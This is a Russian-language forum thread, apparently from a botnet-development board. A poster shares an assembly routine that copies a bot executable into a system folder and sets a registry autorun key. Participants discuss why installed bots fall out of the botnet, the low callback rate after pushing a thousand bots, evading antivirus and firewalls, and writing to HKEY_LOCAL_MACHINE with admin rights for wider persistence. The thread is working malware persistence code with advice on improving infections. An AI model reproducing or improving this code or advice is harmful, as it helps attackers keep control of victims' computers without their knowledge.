Может ктонить пробовал написать меньше? У мну получилось, но баги в том, что почемуто бот кудато уходит постоянно и после перезагрузки компа не возвращается.
код установки бота

proc install
invoke _SHGetSpecialFolderPath,0,ValueName,0015h,0
invoke _lstrcat,ValueName,my_sys_name
mov eax,[fs:18h] ; GetModuleHandle
mov eax,[eax+30h]
mov eax,[eax+8h]
invoke _GetModuleFileName,eax, Value, 256
invoke _CopyFile,Value,ValueName,0

invoke _RegOpenKeyEx,$80000001, n_IKEY, 0, $F003F, key
test eax,eax
jne _i_exit
stdcall _lstrlen,ValueName
invoke _RegSetValueEx,[key], my_sys_name+1, 0, 1, ValueName, eax
invoke _RegCloseKey,[key]
_i_exit:
ret
endp

т.е. уход сопровождается тем, что со временем бот уходит. - это связано тока с тем что компы уходят в офлайн, но странно почеу обратно не возвращаются :(
т.е. мало возврашаются. А также при отгрузке 1к ботов почемуто на отстук выходит 10-20%. при том что тоже самое наблюдалось и в его предке написанном на Delphi

Ну а что ж ты хотел...
Про уходят: это беда всех ботов впринципе. Не всем же жить бесконечно. Аверы не бездействуют. Юзеры тоже могут обнаружить что-то странное.
Про отстук: во-первых, обход фаерволов. во-вторых: совместимость с разными виндами. думаю подробнее обяснять не надо )

похоже ты ставишь автозапуск для текущего пользователя (если это код автозапуска тут приведен). То есть если зайти под другим пользователем программа запущена не будет. Также неплохо бы выполнить проверку доступных прав при установке - если есть права админа то писать в Hkey_local_machine.
И почему все константы записаны цифрами, это очень неудобно.

в моём случае это наоборот удобно. даже очень удобно.